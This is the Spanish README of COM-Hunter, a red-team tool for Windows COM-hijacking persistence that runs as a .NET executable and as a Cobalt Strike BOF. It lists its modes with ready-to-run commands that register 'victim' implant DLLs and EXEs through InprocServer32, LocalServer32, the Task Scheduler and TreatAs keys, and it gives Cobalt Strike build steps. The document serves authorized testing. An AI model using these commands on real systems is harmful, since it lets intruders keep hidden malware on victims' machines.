
Herramienta de persistencia mediante secuestro de COM de Windows con modos de búsqueda, clásico, Programador de tareas y TreatAs. Disponible como ejecutable .NET y BOF de Cobalt Strike para operaciones de equipo rojo.
COM Hijacking VOODOO

COM-Hunter es una herramienta de persistencia mediante COM Hijacking.
Disponible tanto en una versión .NET como en una variante BOF totalmente compatible con Cobalt Strike.
La siguiente lista explica los modos disponibles:
LocalServer32, InprocServer32 y entradas de registro tanto en HKLM como en HKCU.LocalServer32 o InprocServer32.LocalServer32 o InprocServer32.LocalServer32 o InprocServer32.LocalServer32, InprocServer32 y entradas de registro relacionadas tanto en como en .ℹ️ Esta herramienta ha sido seleccionada y forma parte con orgullo del Cobalt Strike Community Kit.
Si encuentras algún error, no dudes en reportarlo. ¡Tus comentarios son valiosos para mejorar la calidad de este proyecto!
Los autores y colaboradores de este proyecto no son responsables por el uso ilegal de la herramienta. Está destinada únicamente a fines educativos. Los usuarios son responsables de garantizar un uso conforme a la ley.
Este proyecto fue creado con ❤️ por @nickvourd && @S1ckB0y1337.
Un agradecimiento especial a mi amigo Marios Gyftos por su invaluable ayuda durante la fase de pruebas beta de esta herramienta.
Inspirado en el curso RTO de @zeropointsecltd.
La implementación BOF está inspirada en Lefteris Panos y su increíble proyecto RegPersist.
Los archivos base.c y bofdefs.h son copias directas del proyecto TrustedSec's CS-Situational-Awareness-BOF.
██████╗ ██████╗ ███╗ ███╗ ██╗ ██╗██╗ ██╗███╗ ██╗████████╗███████╗██████╗
██╔════╝██╔═══██╗████╗ ████║ ██║ ██║██║ ██║████╗ ██║╚══██╔══╝██╔════╝██╔══██╗
██║ ██║ ██║██╔████╔██║█████╗███████║██║ ██║██╔██╗ ██║ ██║ █████╗ ██████╔╝
██║ ██║ ██║██║╚██╔╝██║╚════╝██╔══██║██║ ██║██║╚██╗██║ ██║ ██╔══╝ ██╔══██╗
╚██████╗╚██████╔╝██║ ╚═╝ ██║ ██║ ██║╚██████╔╝██║ ╚████║ ██║ ███████╗██║ ██║
╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═╝ ╚══════╝╚═╝ ╚═╝
Versión: 3.0
@nickvourd && @S1ckB0y1337
~ Inspirado durante el curso RTO por @zeropointsecltd ~
Uso: COM_Hunter.exe <modo> <opciones>
[+] Modos disponibles:
search Modo Búsqueda
persist Modo Persistencia Clásica
tasksch Modo Programador de Tareas
treatas Modo TreatAs
remove Modo Eliminar
[+] Modo Búsqueda:
Uso: COM-Hunter.exe search <CLSID> <opciones>
-a, --all Buscar implementaciones DLL y EXE en HKLM y HKCU
-i, --inprocserver32 Buscar implementaciones DLL en HKLM y HKCU
-l, --localserver32 Buscar implementaciones EXE en HKLM y HKCU
-m, --machine Buscar implementaciones DLL y EXE en HKLM
-u, --user Buscar implementaciones DLL y EXE en HKCU
[+] Modo Persistencia Clásica:
Uso: COM-Hunter.exe persist <CLSID> <ruta_del_binario> <opción>
-i, --inprocserver32 Establecer implementación DLL
-l, --localserver32 Establecer implementación EXE
[+] Modo Programador de Tareas:
Uso: COM-Hunter.exe tasksch <ruta_del_binario> <opción>
-i, --inprocserver32 Establecer implementación DLL
-l, --localserver32 Establecer implementación EXE
[+] Modo TreatAs:
Uso: COM-Hunter.exe treatas <CLSID> <CLSID_falso> <ruta_del_binario> <opción>
-i, --inprocserver32 Establecer implementación DLL
-l, --localserver32 Establecer implementación EXE
[+] Modo Eliminar:
Uso: COM-Hunter.exe remove <CLSID> <opciones>
-a, --all Eliminar implementaciones DLL y EXE en HKLM y HKCU
-i, --inprocserver32 Eliminar implementaciones DLL en HKLM y HKCU
-l, --localserver32 Eliminar implementaciones EXE en HKLM y HKCU
-m, --machine Eliminar implementaciones DLL y EXE en HKLM
-u, --user Eliminar implementaciones DLL y EXE en HKCU
ℹ️ Buscar implementaciones DLL y EXE en HKLM y HKCU:
.\COM-Hunter.exe search 01575CFE-9A55-4003-A5E1-F38D1EBDCBE1 -a
ℹ️ Buscar implementaciones EXE en HKLM y HKCU:
.\COM-Hunter.exe search "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -l
ℹ️ Búsqueda avanzada de implementaciones EXE en HKLM:
.\COM-Hunter.exe search "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -l --machine
ℹ️ Buscar implementaciones EXE y DLL en HKCU:
.\COM-Hunter.exe search AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 --user
ℹ️ Realizar persistencia clásica usando implementación DLL:
.\COM-Hunter.exe persist AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 C:\Users\victim\Desktop\implant.dll -i
ℹ️ Realizar persistencia clásica usando implementación EXE:
.\COM-Hunter.exe persist "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" C:\Users\victim\Desktop\implant.exe --localserver32
ℹ️ Realizar persistencia mediante el Programador de Tareas usando implementación DLL:
.\COM-Hunter.exe tasksch C:\Users\victim\Desktop\implant.dll --inprocserver32
ℹ️ Realizar persistencia a través de la clave de registro TreatAs y un CLSID falso (redirigible) usando implementación DLL:
.\COM-Hunter.exe treatas AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 "{00000012-1312-1997-2605-F38D1EBDCBE1}" C:\Users\victim\Desktop\implant.dll -i
ℹ️ Eliminar persistencia de implementación DLL en HKCU usando:
.\COM-Hunter.exe remove AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 -i -u
ℹ️ Se requiere el toolchain MinGW-w64 (x86_64-w64-mingw32-gcc y i686-w64-mingw32-gcc)
ℹ️ Compila los objetos BOF para ambas arquitecturas:
./make_all.sh
Esto:
com_hunter_*.com_hunter_*.x64.o y com_hunter_*.x86.o.com_hunter_*/.ℹ️ Después de compilar los módulos BOF, simplemente carga com_hunter_bof.cna en Cobalt Strike.
ℹ️ Para limpiar los artefactos de compilación, ve a cada directorio src y ejecuta:
make clean
HKLMHKCU